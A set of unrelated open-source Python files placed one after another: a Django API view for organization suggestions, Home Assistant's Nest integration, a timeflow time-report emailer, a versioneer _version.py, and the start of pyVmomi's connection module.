UPDATE_SUGGESTIONS_ALL):
kind_of_suggestion_task = UPDATE_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW
if kind_of_follow_task not in (FOLLOW_SUGGESTIONS_FROM_TWITTER_IDS_I_FOLLOW, FOLLOW_SUGGESTIONS_FROM_FRIENDS,
FOLLOW_SUGGESTIONS_FROM_FRIENDS_ON_TWITTER):
kind_of_follow_task = ''
results = organization_suggestion_tasks_for_api(voter_device_id=voter_device_id,
kind_of_suggestion_task=kind_of_suggestion_task,
kind_of_follow_task=kind_of_follow_task)
json_data = {
'status': results['status'],
'success': results['success'],
'voter_device_id': voter_device_id,
'kind_of_suggestion_task': kind_of_suggestion_task,
'kind_of_follow_task': kind_of_follow_task,
'organization_suggestion_task_saved': results['organization_suggestion_task_saved'],
'organization_suggestion_list': results['organization_suggestion_list'],
'organization_suggestion_followed_list': results['organization_suggestion_followed_list']
}
return HttpResponse(json.dumps(json_data), content_type='application/json')
def organizations_followed_retrieve_api_view(request): # organizationsFollowedRetrieve
voter_device_id = get_voter_device_id(request) # We standardize how we take in the voter_device_id
maximum_number_to_retrieve = get_maximum_number_to_retrieve_from_request(request)
auto_followed_from_twitter_suggestion = request.GET.get('auto_followed_from_twitter_suggestion', False)
return organizations_followed_retrieve_for_api(voter_device_id=voter_device_id,
maximum_number_to_retrieve=maximum_number_to_retrieve,
auto_followed_from_twitter_suggestion=
auto_followed_from_twitter_suggestion)
|
|
"""Support for Nest devices."""
import asyncio
import logging
from google_nest_sdm.event import EventMessage
from google_nest_sdm.exceptions import (
AuthException,
ConfigurationException,
GoogleNestException,
)
from google_nest_sdm.google_nest_subscriber import GoogleNestSubscriber
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_BINARY_SENSORS,
CONF_CLIENT_ID,
CONF_CLIENT_SECRET,
CONF_MONITORED_CONDITIONS,
CONF_SENSORS,
CONF_STRUCTURE,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed, ConfigEntryNotReady
from homeassistant.helpers import (
aiohttp_client,
config_entry_oauth2_flow,
config_validation as cv,
)
from . import api, config_flow
from .const import DATA_SDM, DATA_SUBSCRIBER, DOMAIN, OAUTH2_AUTHORIZE, OAUTH2_TOKEN
from .events import EVENT_NAME_MAP, NEST_EVENT
from .legacy import async_setup_legacy, async_setup_legacy_entry
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
CONF_PROJECT_ID = "project_id"
CONF_SUBSCRIBER_ID = "subscriber_id"
DATA_NEST_CONFIG = "nest_config"
DATA_NEST_UNAVAILABLE = "nest_unavailable"
NEST_SETUP_NOTIFICATION = "nest_setup"
SENSOR_SCHEMA = vol.Schema(
{vol.Optional(CONF_MONITORED_CONDITIONS): vol.All(cv.ensure_list)}
)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_CLIENT_ID): cv.string,
vol.Required(CONF_CLIENT_SECRET): cv.string,
# Required to use the new API (optional for compatibility)
vol.Optional(CONF_PROJECT_ID): cv.string,
vol.Optional(CONF_SUBSCRIBER_ID): cv.string,
# Config that only currently works on the old API
vol.Optional(CONF_STRUCTURE): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_SENSORS): SENSOR_SCHEMA,
vol.Optional(CONF_BINARY_SENSORS): SENSOR_SCHEMA,
}
)
},
extra=vol.ALLOW_EXTRA,
)
# Platforms for SDM API
PLATFORMS = ["sensor", "camera", "climate"]
async def async_setup(hass: HomeAssistant, config: dict):
"""Set up Nest components with dispatch between old/new flows."""
hass.data[DOMAIN] = {}
if DOMAIN not in config:
return True
if CONF_PROJECT_ID not in config[DOMAIN]:
return await async_setup_legacy(hass, config)
if CONF_SUBSCRIBER_ID not in config[DOMAIN]:
_LOGGER.error("Configuration option '{CONF_SUBSCRIBER_ID}' required")
return False
# For setup of ConfigEntry below
hass.data[DOMAIN][DATA_NEST_CONFIG] = config[DOMAIN]
project_id = config[DOMAIN][CONF_PROJECT_ID]
config_flow.NestFlowHandler.register_sdm_api(hass)
config_flow.NestFlowHandler.async_register_implementation(
hass,
config_entry_oauth2_flow.LocalOAuth2Implementation(
hass,
DOMAIN,
config[DOMAIN][CONF_CLIENT_ID],
config[DOMAIN][CONF_CLIENT_SECRET],
OAUTH2_AUTHORIZE.format(project_id=project_id),
OAUTH2_TOKEN,
),
)
return True
class SignalUpdateCallback:
"""An EventCallback invoked when new events arrive from subscriber."""
def __init__(self, hass: HomeAssistant):
"""Initialize EventCallback."""
self._hass = hass
async def async_handle_event(self, event_message: EventMessage):
"""Process an incoming EventMessage."""
if not event_message.resource_update_name:
return
device_id = event_message.resource_update_name
events = event_message.resource_update_events
if not events:
return
_LOGGER.debug("Event Update %s", events.keys())
device_registry = await self._hass.helpers.device_registry.async_get_registry()
device_entry = device_registry.async_get_device({(DOMAIN, device_id)})
if not device_entry:
return
for event in events:
event_type = EVENT_NAME_MAP.get(event)
if not event_type:
continue
message = {
"device_id": device_entry.id,
"type": event_type,
"timestamp": event_message.timestamp,
}
self._hass.bus.async_fire(NEST_EVENT, message)
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Set up Nest from a config entry with dispatch between old/new flows."""
if DATA_SDM not in entry.data:
return await async_setup_legacy_entry(hass, entry)
implementation = (
await config_entry_oauth2_flow.async_get_config_entry_implementation(
hass, entry
)
)
config = hass.data[DOMAIN][DATA_NEST_CONFIG]
session = config_entry_oauth2_flow.OAuth2Session(hass, entry, implementation)
auth = api.AsyncConfigEntryAuth(
aiohttp_client.async_get_clientsession(hass),
session,
config[CONF_CLIENT_ID],
config[CONF_CLIENT_SECRET],
)
subscriber = GoogleNestSubscriber(
auth, config[CONF_PROJECT_ID], config[CONF_SUBSCRIBER_ID]
)
callback = SignalUpdateCallback(hass)
subscriber.set_update_callback(callback.async_handle_event)
try:
await subscriber.start_async()
except AuthException as err:
_LOGGER.debug("Subscriber authentication error: %s", err)
raise ConfigEntryAuthFailed from err
except ConfigurationException as err:
_LOGGER.error("Configuration error: %s", err)
subscriber.stop_async()
return False
except GoogleNestException as err:
if DATA_NEST_UNAVAILABLE not in hass.data[DOMAIN]:
_LOGGER.error("Subscriber error: %s", err)
hass.data[DOMAIN][DATA_NEST_UNAVAILABLE] = True
subscriber.stop_async()
raise ConfigEntryNotReady from err
try:
await subscriber.async_get_device_manager()
except GoogleNestException as err:
if DATA_NEST_UNAVAILABLE not in hass.data[DOMAIN]:
_LOGGER.error("Device manager error: %s", err)
hass.data[DOMAIN][DATA_NEST_UNAVAILABLE] = True
subscriber.stop_async()
raise ConfigEntryNotReady from err
hass.data[DOMAIN].pop(DATA_NEST_UNAVAILABLE, None)
hass.data[DOMAIN][DATA_SUBSCRIBER] = subscriber
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, platform)
)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Unload a config entry."""
if DATA_SDM not in entry.data:
# Legacy API
return True
_LOGGER.debug("Stopping nest subscriber")
subscriber = hass.data[DOMAIN][DATA_SUBSCRIBER]
subscriber.stop_async()
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(entry, platform)
for platform in PLATFORMS
]
)
)
if unload_ok:
hass.data[DOMAIN].pop(DATA_SUBSCRIBER)
hass.data[DOMAIN].pop(DATA_NEST_UNAVAILABLE, None)
return unload_ok
|
|
import datetime as dt
import smtplib
from collections import defaultdict
from collections import OrderedDict
from timeflow.settings import Settings
from timeflow.utils import DATE_FORMAT
from timeflow.utils import DATETIME_FORMAT
from timeflow.utils import calc_time_diff
from timeflow.utils import date_begins
from timeflow.utils import date_ends
from timeflow.utils import format_duration_long
from timeflow.utils import format_duration_short
from timeflow.utils import get_time
from timeflow.utils import parse_lines
from timeflow.utils import strip_log
def get_total_stats_times(work_time, slack_time, today_work_time):
"""
Returns string output for totals times spent working and slacking
"""
output = 'Work: {}\n'.format(format_duration_short(sum(work_time)))
output += 'Slack: {}'.format(format_duration_short(sum(slack_time)))
if today_work_time:
today_hours, today_minutes = get_time(today_work_time)
output += '\n\nToday working for: {}'.format(
format_duration_short(today_work_time)
)
return output
def create_report(report_dict):
"""
Returns string output for stats report
"""
output = ""
report_dict = OrderedDict(sorted(report_dict.items()))
for project in report_dict:
project_output = "{}:\n".format(project)
project_report = report_dict[project]
total_seconds = 0
for log in project_report:
log_seconds = project_report[log]
total_seconds += log_seconds
# if log is empty - just state the project name
if not log:
log = project
project_output += " {time}: {log}\n".format(
time=format_duration_long(log_seconds),
log=log
)
project_output += " Total: {time}\n".format(
time=format_duration_long(total_seconds),
)
output += project_output
output += '\n'
# remove trailing newlines as they may add up in the pipeline
return output.strip('\n')
def create_full_report(work_report_dict, slack_report_dict):
"""
Returns report for both - work and slack
"""
output = ""
work_report = create_report(work_report_dict)
slack_report = create_report(slack_report_dict)
output += "{:-^67s}\n".format(" WORK ")
output += work_report
output += "\n" # I want empty line between work and slack report
output += "{:-^67s}\n".format(" SLACK ")
output += slack_report
return output
def create_report_as_gtimelog(report_dict, literal_time_range=''):
"""
Returns string output for report which is generated as in gtimelog
"""
output = ""
project_totals_output = ""
output += "{}{}\n".format(" " * 64, "time")
report_dict = OrderedDict(sorted(report_dict.items()))
total_seconds = 0
for project in report_dict:
total_project_seconds = 0
project_report = report_dict[project]
for log in project_report:
entry = "{}: {}".format(project, log)
seconds = project_report[log]
time_string = format_duration_short(seconds)
output += "{:62s} {}\n".format(entry, time_string)
total_project_seconds += seconds
project_totals_output += "{:62s} {}\n".format(project, format_duration_short(total_project_seconds))
total_seconds += total_project_seconds
output += "\n"
output += "Total work done{}{}: {}\n\n".format(
' ' if literal_time_range else '', # add space if time range exists
literal_time_range,
format_duration_short(total_seconds)
)
output += "By category:\n\n"
output += project_totals_output
return output
def calculate_stats(lines, date_from, date_to, today=False):
work_time = []
slack_time = []
today_work_time = None
line_begins = date_begins(lines, date_from)
line_ends = date_ends(lines, date_to)
date_not_found = (line_begins is None or line_ends < line_begins)
if date_not_found:
return work_time, slack_time, today_work_time
data = parse_lines()
for i, line in enumerate(data[line_begins:line_ends + 1]):
# if we got to the last line - stop
if line_begins + i + 1 > line_ends:
break
next_line = data[line_begins + i + 1]
line_date = line.date
next_line_date = next_line.date
# if it's day switch, skip this cycle
if line_date != next_line_date:
continue
if next_line.is_slack:
slack_time.append(calc_time_diff(line, next_line))
else:
work_time.append(calc_time_diff(line, next_line))
if today:
today_start_time = dt.datetime.strptime(
"{} {}".format(data[line_begins].date, data[line_begins].time),
DATETIME_FORMAT
)
today_work_time = (dt.datetime.now() - today_start_time).seconds
return work_time, slack_time, today_work_time
def calculate_report(lines, date_from, date_to,
filter_projects=[],
exclude_projects=[]):
"""Creates and returns report dictionaries
Report dicts have form like this:
{<Project>: {<log_message>: <accumulative time>},
{<log_message1>: <accumulative time1>}}
"""
# XXX: need to check that same project is not in both: filters and excludes
work_dict = defaultdict(lambda: defaultdict(dict))
slack_dict = defaultdict(lambda: defaultdict(dict))
line_begins = date_begins(lines, date_from)
line_ends = date_ends(lines, date_to)
date_not_found = (line_begins is None or line_ends < line_begins)
if date_not_found:
return work_dict, slack_dict
data = parse_lines()
for i, line in enumerate(data[line_begins:line_ends + 1]):
# if we got to the last line - stop
if line_begins + i + 1 > line_ends:
break
next_line = data[line_begins + i + 1]
line_date = line.date
next_line_date = next_line.date
# if it's day switch, skip this cycle
if line_date != next_line_date:
continue
time_diff = calc_time_diff(line, next_line)
project = strip_log(next_line.project)
if project_should_be_in_report(project, filter_projects, exclude_projects):
log = strip_log(next_line.log)
if next_line.is_slack:
# if log message is identical add time_diff
# to total time of the log
if slack_dict[project][log]:
total_time = slack_dict[project][log]
total_time += time_diff
slack_dict[project][log] = total_time
else:
slack_dict[project][log] = time_diff
else:
if work_dict[project][log]:
total_time = work_dict[project][log]
total_time += time_diff
work_dict[project][log] = total_time
else:
work_dict[project][log] = time_diff
return work_dict, slack_dict
def project_should_be_in_report(project, filters, excludes):
if project in filters:
return True
elif project in excludes:
return False
elif filters == []:
return True
elif excludes == []:
return False
def get_daily_report_subject(day, person):
"""
Returns subject string for daily report email
`day:datetime.date` - date of the day we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
# it's possible to use strftime('%a'), but it's locale sensitive,
# and I do not want this
weekday_names = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
calendar_time = "{weekday}, week {week:02}".format(
weekday=weekday_names[day.isocalendar()[2]],
week=day.isocalendar()[1],
)
subject = "{day} report for {person} ({calendar_time})".format(
day=day.strftime(DATE_FORMAT),
person=person,
calendar_time=calendar_time
)
return subject
def get_weekly_report_subject(week_day, person):
"""
Returns subject string for weekly report email
`week_day:datetime.date` - any date for the week we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
calendar_time = "week {:02}".format(week_day.isocalendar()[1])
subject = "Weekly report for {person} ({calendar_time})".format(
person=person,
calendar_time=calendar_time
)
return subject
def get_monthly_report_subject(month_day, person):
"""
Returns subject string for monthly report email
`month_day:datetime.date` - any date for the month we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
calendar_time = "{year}/{month:02}".format(
year=month_day.year,
month=month_day.month
)
subject = "Monthly report for {person} ({calendar_time})".format(
person=person,
calendar_time=calendar_time
)
return subject
def get_custom_range_report_subject(date_from, date_to, person):
subject = "Custom date range report for {person} ({_from:%Y-%m-%d} - {to:%Y-%m-%d})".format(
person=person,
_from=date_from,
to=date_to,
)
return subject
def email_report(date_from, date_to, report, email_time_range=None):
settings = Settings()
settings.load()
sender = settings.email_address
receivers = [settings.activity_email]
date_from_time_range = dt.datetime.strptime(date_from, DATE_FORMAT)
subject = ''
if email_time_range == 'day':
subject = get_daily_report_subject(date_from_time_range, settings.name)
elif email_time_range == 'week':
subject = get_weekly_report_subject(date_from_time_range, settings.name)
elif email_time_range == 'month':
subject = get_monthly_report_subject(date_from_time_range, settings.name)
else:
# convert date strings to datetime objects
_date_from = dt.datetime.strptime(date_from, DATE_FORMAT)
_date_to = dt.datetime.strptime(date_to, DATE_FORMAT)
subject = get_custom_range_report_subject(_date_from, _date_to, settings.name)
full_subject = "[Activity] {}".format(subject)
message = (
"From: {}\n"
"To: {}\n"
"Subject: {}\n\n"
"{}"
).format(sender, ", ".join(receivers), full_subject, report)
try:
conn = smtplib.SMTP(settings.smtp_server, settings.smtp_port)
conn.ehlo()
conn.starttls()
conn.login(settings.email_user, settings.email_password)
conn.sendmail(sender, receivers, message)
print("Successfully sent email")
except smtplib.SMTPException:
print("Error: unable to send email")
|
|
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = ""
cfg.versionfile_source = "stable_world/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {"version": rendered, "full-revisionid": pieces["long"],
"dirty": pieces["dirty"], "error": None,
"date": pieces.get("date")}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split('/'):
root = os.path.dirname(root)
except NameError:
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|
|
# VMware vSphere Python SDK
# Copyright (c) 2008-2021 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
## @file connect.py
## @brief Connect to a VMOMI ServiceInstance.
##
## Detailed description (for Doxygen goes here)
"""
Connect to a VMOMI ServiceInstance.
Detailed description (for [e]pydoc goes here).
"""
from six import reraise
import sys
import re
import ssl
from xml.etree import ElementTree
from xml.parsers.expat import ExpatError
from six.moves import http_client
import requests
from requests.auth import HTTPBasicAuth
from pyVmomi import vim, vmodl, SoapStubAdapter, SessionOrientedStub
from pyVmomi.SoapAdapter import CONNECTION_POOL_IDLE_TIMEOUT_SEC
from pyVmomi.VmomiSupport import nsMap, versionIdMap, versionMap, IsChildVersion
from pyVmomi.VmomiSupport import GetServiceVersions
"""
Global regular expression for parsing host and port connection
See http://www.ietf.org/rfc/rfc3986.txt sec 3.2.2
"""
_rx = re.compile(r"(^\[.+\]|[^:]+)(:\d+)?$")
_si = None
"""
Global (thread-shared) ServiceInstance
@todo: Get rid of me?
"""
def getSslContext(host, sslContext, disableSslCertValidation):
"""
Connections to 'localhost' do not need SSL verification as a certificate
will never match. The OS provides security by only allowing root to bind
to low-numbered ports.
"""
if disableSslCertValidation or (not sslContext and host in ['localhost', '127.0.0.1', '::1']):
sslContext = ssl._create_unverified_context()
return sslContext
class closing(object):
"""
Helper class for using closable objects in a 'with' statement,
similar to the one provided by contextlib.
"""
def __init__(self, obj):
